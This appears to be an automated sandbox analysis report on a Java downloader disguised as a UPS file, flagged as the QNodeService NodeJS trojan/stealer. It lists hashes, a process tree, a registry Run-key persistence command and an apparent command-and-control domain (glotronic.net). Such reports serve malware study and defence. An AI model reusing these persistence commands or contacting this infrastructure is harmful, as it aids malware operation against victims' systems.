Analysis
-
max time kernel
133s -
max time network
133s -
platform
windows10_x64 -
resource
win10 -
submitted
23-10-2020 17:38
Static task
static1
Behavioral task
behavioral1
Sample
UPS_AD12300AW_1290499D.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
UPS_AD12300AW_1290499D.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
UPS_AD12300AW_1290499D.jar
-
Size
77KB
-
MD5
53c0c382644adebe67a8af12d50cd35e
-
SHA1
8850f62e32c9f89bd4dc4ae419ef51b4b3009207
-
SHA256
c882fc449cd0ca0348938fec76bd0200a3aeadb6d874728b5f15ade967c72c17
-
SHA512
57f9c30622c671348dd683a423ed5c69cee8d61873c1b14c3207641a990fd8712198feb5204d940b7c52c11586d9af60cc066e1af5a133c7f4dcbc0a10198aa4
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2060 node.exe 2280 node.exe 3816 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\9a180dc4-014b-4a3a-a701-7b5807b295cc = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab75-172.dat js behavioral2/files/0x000100000001ab75-177.dat js behavioral2/files/0x000100000001ab75-181.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 wtfismyip.com 25 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2060 node.exe 2060 node.exe 2060 node.exe 2060 node.exe 2280 node.exe 2280 node.exe 2280 node.exe 2280 node.exe 3816 node.exe 3816 node.exe 3816 node.exe 3816 node.exe 3816 node.exe 3816 node.exe 3816 node.exe 3816 node.exe 3816 node.exe 3816 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 488 wrote to memory of 2804 488 java.exe 75 PID 488 wrote to memory of 2804 488 java.exe 75 PID 2804 wrote to memory of 2060 2804 javaw.exe 76 PID 2804 wrote to memory of 2060 2804 javaw.exe 76 PID 2060 wrote to memory of 2280 2060 node.exe 78 PID 2060 wrote to memory of 2280 2060 node.exe 78 PID 2280 wrote to memory of 3816 2280 node.exe 79 PID 2280 wrote to memory of 3816 2280 node.exe 79 PID 3816 wrote to memory of 2720 3816 node.exe 81 PID 3816 wrote to memory of 2720 3816 node.exe 81 PID 2720 wrote to memory of 2868 2720 cmd.exe 82 PID 2720 wrote to memory of 2868 2720 cmd.exe 82
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\UPS_AD12300AW_1290499D.jar1⤵
- Suspicious use of WriteProcessMemory
PID:488 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\5fc8bb84.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain glotronic.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_YFFinm\boot.js --hub-domain glotronic.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_YFFinm\boot.js --hub-domain glotronic.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9a180dc4-014b-4a3a-a701-7b5807b295cc" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9a180dc4-014b-4a3a-a701-7b5807b295cc" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2868
-
-
-
-
-
-